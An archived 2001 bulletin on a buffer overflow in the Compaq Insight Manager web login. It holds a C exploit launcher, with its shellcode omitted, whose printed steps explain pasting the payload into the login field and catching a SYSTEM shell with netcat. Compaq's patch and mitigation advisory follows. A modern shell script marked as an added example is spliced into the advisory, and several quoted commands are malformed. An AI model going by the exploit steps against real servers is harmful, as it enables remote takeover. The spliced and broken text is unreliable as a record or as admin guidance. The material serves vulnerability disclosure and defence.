1st Oct 2001 [SBWID-4744]
COMMAND
Compaq Insight Manager
SYSTEMS AFFECTED
Compaq Insight Manager Web Interface
PROBLEM
Update
======
Indigo published an exploit for this: the bug is in the "User Name"
field of web login:
/* comphack.c - Compaq Insight Manager
overflow exploit by Indigo 2001
Usage: comphack
This code has been compiled and tested
on Linux and Win32
The shellcode spawns a SYSTEM shell on
the chosen port
Main shellcode adapted from code written
by izan@deepzone.org
Greets to:
Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/
/* #include uncomment if compiling on
Win32 */
#include
int main(int argc, char **argv)
{
unsigned char shellcode[] = ""; /* payload bytes omitted */
FILE *fp;
unsigned short int a_port;
printf ("\nCompaq Insight Manager overflow launcher\nby Indigo 2001\n\n");
printf ("This program will generate a binary file called exploit.bin\n");
printf ("Connect to the victim using a web browser http://victim:2301\n");
printf ("Next to \'Login Account\', click on \'anonymous\'\n");
printf ("Enter some random characters into the \'password\' field\n");
printf ("Open exploit.bin in notepad, highlight it then copy to the clipboard\n");
printf ("Paste the exploit into the \'Name\' field and click OK\n");
printf ("\nLaunch netcat: nc \n");
printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n");
if (argc != 2)
{
printf ("Usage: %s \n", argv[0]);
exit (0);
}
a_port = htons(atoi(argv[1]));
a_port^= 0x5f5f;
shellcode[1650]= (a_port) & 0xff;
shellcode[1651]= (a_port >> 8) & 0xff;
fp = fopen ("./exploit.bin","wb");
fputs (shellcode,fp);
fclose (fp);
return 0;
}
Compaq Management Software Security Advisory #SSRT0758 :
(c) Copyright 2001 Compaq Computer Corporation. All rights reserved.
Compaq Management Software Security Vulnerability (SSRT0758)
SOURCE: Software Security Response Team U.S.
Compaq Computer Corporation
*Reference SSRT0758*
PATCHES SUPERSEDED BY THIS ADVISORY:
The software upgrades and patches also fix all previous Compaq
Management Software security vulnerabilities reported in the following
Compaq Security Advisories:
* Compaq Management Software Security Vulnerability - SSRT0715
(March, 2001)
* Compaq Web-enabled Management Software Security Vulnerability
- SSRT0705 (January 2001)
SUMMARY
Compaq Management Software products undergo rigorous quality assurance
processes to ensure that they meet the highest possible standards for
security, reliability and usability. In line with this commitment,
Compaq recently uncovered a potential buffer overflow security
vulnerability in its Web-enabled Management Software. This
vulnerability has the potential to enable unauthorized users to execute
code at an administrator level through the exploitation of a buffer
overflow. Compaq has addressed this issue with version 5.2 of the
Compaq Management Agents and developed a patch that may be downloaded
from the Compaq website (see details below) to fix existing Agents
installations.
Compaq strongly recommends that customers upgrade to version 5.2 of the
Compaq Management Agents or apply the appropriate patch.
Compaq strongly recommends that web-enabled agents and utilities be
deployed only on private networks and are not used on the open Internet
or on systems outside the bounds of the firewall. The implementation of
sound security practices, which includes disabling external access to
Compaq management ports should help to protect customers from external
malicious attacks. Compaq also recommends that strong password
standards are used and that passwords are changed regularly.
NOTE: The complete online document is available from
http://www.compaq.com/manage/security and should be
checked frequently for new patch release information.
If a TBD is entered for a product, please contact your
normal Compaq support channel to inquire about a
specific product solution status.
SCOPE OF THE PROBLEM
The web component of Compaq web-enabled management software provides
HTTP services to allow management information to be accessible through
a web browser. Web-enabled management software is provided for the
majority of the operating systems that Compaq supports on its
Intel-based and Alpha-based server and client systems. These operating
systems include Microsoft Windows 9x, Windows NT and Windows 2000,
Novell NetWare, SCO UnixWare 7, Red Hat Linux 6.2 and 7.0, SuSE Linux
7.0 & 7.1, Tru64 Unix and Open VMS. Web-enabled management software
is also supported for Compaq storage products.
This Security Advisory applies to all Compaq Web-enabled Management
Software. A list of affected software versions is available at
http://www.compaq.com/products/servers/management/mgtsw-advisory2.html
(note the url above may wrap unintentionally)
UNAFFECTED SOFTWARE VERSIONS
The web-enabled component of the Compaq Remote Insight Lights-Out
Edition board is NOT affected. Also unaffected are the downloadable
integration modules that Compaq provides to enhance the management of
Compaq platforms from within enterprise management consoles such as CA
Unicenter TNG, Tivoli Enterprise, Tivoli NetView, and HP OpenView.
WHAT COMPAQ IS DOING
Compaq is currently completing the testing and release of fixes for the
affected software. Compaq Management CD Version 5.2 includes an update
that fixes the buffer overflow security vulnerability issue in some
Compaq Web-enabled Management Software. In addition to releasing new
versions of the software, Compaq will also release software patches to
update existing versions of the web-enabled management software.
Three patches are now available for download from:
ftp://ftp.compaq.com/pub/softpaq/sp17501-18000/
SoftPaq SP 17926 fixes the problem for affected versions of Compaq
Foundation Agents for Windows Servers, Compaq Survey for Windows,
Compaq Power Manager, Compaq Intelligent Cluster Administrator,
and Compaq Availability Agents. This patch also fixes the problem
for the SNMP and DMI agents installed with Compaq Insight Manager
XE Version 2.0 and 2.1. Compaq recommends applying the patch if
any of the Compaq Management Software mentioned above is
installed.
SoftPaq SP 17927 fixes the problem for affected versions of the
Compaq Foundation Agents for Novell NetWare servers.
SoftPaq SP 17928 fixes the problem for affected versions of the
Compaq Foundation Agents for Linux servers
Compaq Security Advisory SSRT0758 will be updated as needed to
communicate availability and plans for new versions of all the affected
software.
WHAT CUSTOMERS SHOULD DO
Determine which systems are running Compaq web-enabled agents or
utilities. There are three methods suggested.
Method 1
Point a web browser to the system by keying in http://[IP_ADDRESS]:2301
or http://[machine_name]:2301.
This will bring up the device home page for any servers running
web-enabled management software, and display a list of the components.
NOTE: The lists generated by Methods 2 and 3, while helpful, may not be
exhaustive lists of the systems with web-enabled agents and utilities.
The lists will include only those systems that are being managed either
explicitly or because they have been discovered.
Method 2
Systems running Compaq Insight Manager XE, can get a list of systems
running the web-enabled agents by defining a Query to return a list of
systems with web agents.
Login to your Compaq Insight Manager XE system and create a new
Query. Select the "Devices with Web Agent" criteria. Select all of the
available products on the Criteria Configuration screen. Save the Query
and execute it. The list of devices will be all those with web agents.
Method 3
Systems running Compaq Insight Manager Windows 32 console, can get a
list of systems running the web agents by starting Compaq Insight
Manager and selecting the "Web Device List" button on the toolbar.
This will display a list of systems being managed by Compaq Insight
Manager and additionally will have underlined as hyperlinks the systems
on which the web agents are present and enabled. To print out a list of
only the web devices, select the "Web Devices" hyperlink in the left
column and only web devices will be shown. Print this page from your
browser.
If for any reason the software cannot be updated or the patch applied,
Compaq recommends that the web-enabled components of Compaq Management
Software be temporarily disabled by following the procedures outlined
at the end of this advisory.
Compaq has always advised that web-enabled agents and utilities be
deployed only in private networks and not used on the Internet or on
systems outside the bounds of a firewall. Verify that you have
disallowed access to non-essential IP ports on your firewall or proxy
protecting the corporate network from the Internet. The disabling of
such ports, which include port 2301 (Device Management Port) and port
280 (Compaq Insight Manager XE port), is part of a sound security
policy for your network.
SOLUTION
Updated software will be made available on the web through the system
software download site
(http://www.compaq.com/support/files/server/us/index.html) and will
also be proactively delivered directly to customers who have installed
Compaq ActiveUpdate. Compaq recommends registering for the
ActiveUpdate service, which is available at the following URL:
http://www.compaq.com/activeupdate.
OBTAINING SUPPORT ON THIS ISSUE
The normal process for obtaining support on Compaq products is pursued
in the country of residence. If you do not have an established
support process, you may find information about support by visiting the
Compaq web site for your country. You can find that web site by picking
your country from the list at http://www.compaq.com/worldwide/. You may
also find a support number for your locale from the table at
http://www.compaq.com/corporate/overview/world_offices.html
Support can help you to: 1. Identify if you have an affected version.
2. Obtain the appropriate SoftPaq when it is available. 3. Apply and
run the SoftPaq. Compaq support personnel are aware of the issues and
the fixes and are well versed in Compaq systems management products.
DISABLING THE WEB-ENABLED AGENTS
If you are unable to wait for the fix to become available, you can use
the following procedures to disable the web component of the agents.
For those cases where it is not possible to disable only the web
component, instructions are provided below for disabling the entire
agent or utility.
Microsoft Windows Servers
Web-based management is enabled, by default, when you install the
Compaq Server Management Agents for Windows NT. Perform the following
steps to disable web-based management:
1. From the START menu, select SETTINGS, then CONTROL PANEL.
2. From the CONTROL PANEL, select and run the SERVICES applet.
3. Select INSIGHT WEB AGENT from the list of services.
4. If it is running, click the button marked STOP.
5. To prevent it from automatically starting again, click STARTUP and
then select DISABLED.
6. Click OK.
7. Click CLOSE.
This will stop the web agents and prevent them from starting
automatically. SNMP management is still enabled.
For Windows 2000 - Right click My Computer on the desktop; select
Manage. This will display a window titled "Computer Management".
Click the "Services" item under the "Services and Applications"
node. The right side of the window will show the services installed on
the system. Perform steps 3 through 7 from above.
NetWare Server Agents
If you enabled web-based management when you installed the Compaq
Management Agents for NetWare, and later would like to disable it,
perform the following steps from the NetWare server console:
1. LOAD CPQAGIN.
2. Select the option "Configure Existing NetWare Agents".
3. Select the line that mentions the loading of CPQWEBAG and select NO.
4. Save changes and exit CPQAGIN.
This prevents the web-enabled agents from loading. SNMP management is
still enabled.
Linux Server Agents
To stop running web agent:
1. Log in as "root".
2. Run "/etc/rc.d/init.d/cmafdtn stop cmawebd" command.
To disable web agent so it will not start during reboot or run level
changes:
1. Log in as "root".
2. Edit "/etc/rc.d/init.d/cmafdtn" file (using vi or other
editors) and remove "cmawebd" from following line:
PNAMES="cmafdtnpeerd cmahostd cmathreshd cmawebd"
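The second Linux procedure above (removing cmawebd from PNAMES so the web agent does not start at boot), scripted as an added example that is not part of Compaq's advisory. The function name, the backup suffix and the sample file built by demo() are assumptions; the default path and the PNAMES line are the ones the advisory quotes.

```shell
#!/bin/sh
# Added example, not Compaq's code. Removes cmawebd from the PNAMES line of
# the cmafdtn init script (path and line format as quoted in the advisory).

disable_cmawebd() {
    script="${1:-/etc/rc.d/init.d/cmafdtn}"
    backup="$script.pre-ssrt0758"      # backup suffix is an arbitrary choice
    tmp="$script.tmp.$$"

    [ -f "$script" ] || { echo "not found: $script" >&2; return 2; }

    # Already disabled (or never listed): leave the file untouched.
    if ! grep -Eq '^[[:space:]]*PNAMES=.*[" ]cmawebd[" ]' "$script"; then
        echo "cmawebd is not listed in PNAMES in $script"
        return 0
    fi

    cp -p "$script" "$backup" || return 1

    # Edit only the PNAMES assignment. The three substitutions cover cmawebd
    # in the middle or at the end of the list, at the start, and as the only
    # entry.
    sed -E '/^[[:space:]]*PNAMES=/ {
        s/[[:space:]]+cmawebd([[:space:]"])/\1/
        s/"cmawebd[[:space:]]+/"/
        s/"cmawebd"/""/
    }' "$backup" > "$tmp" || { rm -f "$tmp"; return 1; }

    # Write through the existing file so its owner and mode are preserved.
    cat "$tmp" > "$script" || { rm -f "$tmp"; return 1; }
    rm -f "$tmp"

    # Confirm the edit took effect before reporting success.
    if grep -Eq '^[[:space:]]*PNAMES=.*[" ]cmawebd[" ]' "$script"; then
        echo "cmawebd still listed in $script; restore from $backup" >&2
        return 1
    fi
    echo "cmawebd removed from PNAMES in $script (backup: $backup)"
}

# Constructed sample: a stand-in init script containing the advisory's line,
# edited in a temporary directory so the demo never touches /etc.
demo() {
    dir=$(mktemp -d) || return 1
    printf '%s\n' '#!/bin/sh' \
        'PNAMES="cmafdtnpeerd cmahostd cmathreshd cmawebd"' \
        'for p in $PNAMES; do echo "starting $p"; done' > "$dir/cmafdtn"
    disable_cmawebd "$dir/cmafdtn" >/dev/null && grep '^PNAMES=' "$dir/cmafdtn"
    rc=$?
    rm -rf "$dir"
    return $rc
}

demo
```

On a real host, call disable_cmawebd with no argument as root after stopping the running daemon with the advisory's "cmafdtn stop cmawebd" command.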
SCO UnixWare 7 Agents (UnixWare 2 agents are NOT Web-Enabled)
To stop running web agent:
1. Log in as "root".
2. Run "sh /etc/init.d/cmaweb stop" command.
To disable web agent so it will not be started during reboot or when
entering multi-user mode:
1. Log in as "root".
2. Run "rm /etc/rc2.d/[SK]*cmaweb" command.
SCO OpenServer Agents
To stop running web agent:
1. Log in as "root".
2. Run "sh /etc/cmaweb stop" command.
To disable Web Agent so it will not be started during reboot or entering
multi-user mode:
1. Log in as "root".
2. Run "rm /etc/rc2.d/[SK]*cmaweb" command.
Survey for Windows, Survey for NetWare, and Survey for Linux
It is not possible to disable only the web-component of Survey Utility.
Follow the instructions below to disable the full service:
Survey for Windows
From the command prompt, type the following command:
%SystemDrive%\COMPAQ\SURVEY\SURVEY-U
This will unload the Survey service and prevent it from starting up on
the next reboot.
Survey for NetWare
To unload Survey for NetWare from the console screen, type the
following command: UNLOAD SURVEY
During the default Survey install, Survey is automatically started by
adding the line "load SURVEY -w10 -cWed.12,7 " to the AUTOEXEC.NCF.
To prevent Survey from automatically starting next time the server is
restarted, remove that line.
Survey for Linux
To stop the Survey for Linux web daemon, type the following command:
kill `ps -e | grep surveywebd | awk '{print $1}'`
System Healthcheck
1. Change to the SHC bin directory (e.g. cd %systemdrive%\compaq\shc\bin).
2. Stop the service by typing "net stop cpqshc".
3. Remove the service by typing "shcsvc -remove".
Note that the command line interface to SHC will continue to work.
Compaq Power Management Agents
To stop running web agent:
1. From the Windows Control Panel, double-click "Services".
2. In the Services dialog list box, click on "Compaq
Power Management Web Agent".
3. Click the "Stop" button to stop the Agent.
To prevent the service from being restarted, click on the
"Startup..." button and choose "Disabled", and then click "OK".
OpenVMS Management Agents
To stop running web agent:
1. Log into the system account.
2. For V1.0 and V2.0
$@sys$specific:[wbem]stop_webagents
3. For V2.1 $@sys$specific:[wbem]wbem$shutdown
Compaq Management Agents and Tools for Servers for SCO UnixWare 7
NonStop Clusters
To stop running web agent:
1. Login as "root".
2. Execute the following two command lines:
execute `onall /etc/init.d/cmaweb stop`
`chmod 777 /etc/init.d/cmaweb 000
Tru64 UNIX Management Agents
To stop running Web Agent:
1. Log in as "root".
2. Execute "/sbin/init.d/insightd stop" command.
To disable the Web Agents so they will not be started during
reboot or when entering multi-user mode:
1. Log in as "root".
2. On Tru64 UNIX V4.0f and V4.0g, execute "rm
/sbin/rc2.d/*insightd".
3. On Tru64 UNIX V5.0 and later, execute the
command: "/usr/sbin/rcmgr set INSIGHTD_CONF -1".
To enable the Web Agents again once the Patch Kit has been
installed:
1. Log in as "root".
2. On Tru64 UNIX V4.0f and V4.0g, execute the command:
"ln -s /sbin/init.d/insightd/sbin/rc2.d/ Kxxinsightd"
where xx is any sequence Nb after the one used for snmpd
3. On Tru64 UNIX V5.0 and later, execute the
command: "/usr/sbin/rcmgr set INSIGHTD_CONF 1".
Desktop and Portable Web-Enabled Agents
To remove the web-enabled components from the desktop and portables
agents, follow the instructions below to uninstall the agents using the
Add/Remove feature in Windows systems, then reinstall the agents without
the DMI web components.
Uninstalling Web-Enabled Desktop Agent from a Windows 9x/NT system
1. From the START menu, select SETTINGS, then CONTROL PANEL.
2. From the CONTROL PANEL, select ADD/REMOVE PROGRAMS.
3. In the INSTALL/UNINSTALL tab, select "Compaq Insight Management
Web Agent".
4. Click ADD/REMOVE button to remove the agent.
For desktops and workstations, do not check "DMI Web Component"
during the installation.
To install the Compaq Management Agents for portables without web
support, select "custom" and then select "DMI options". Click on
the "Change" button. Remove the check marks for "Compaq DMI Web
Agent" and "Compaq DMI Web Viewer".
COMPAQ AND/OR ITS RESPECTIVE SUPPLIERS MAKE NO REPRESENTATIONS ABOUT
THE SUITABILITY OF THE INFORMATION CONTAINED IN THE DOCUMENTS AND
RELATED GRAPHICS AND/OR SOFTWARE PUBLISHED ON THIS SERVER FOR ANY
PURPOSE. ALL SUCH DOCUMENTS AND RELATED GRAPHICS ARE PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND AND ARE SUBJECT TO CHANGE WITHOUT NOTICE.
THE ENTIRE RISK ARISING OUT OF THEIR USE REMAINS WITH THE RECIPIENT. IN
NO EVENT SHALL COMPAQ AND/OR ITS RESPECTIVE SUPPLIERS BE LIABLE FOR ANY
DIRECT, CONSEQUENTIAL, INCIDENTAL, SPECIAL, PUNITIVE OR OTHER DAMAGES
WHATSOEVER (INCLUDING WITHOUT LIMITATION, DAMAGES FOR LOSS OF BUSINESS
PROFITS, BUSINESS INTERRUPTION, OR LOSS OF BUSINESS INFORMATION), EVEN
IF COMPAQ HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.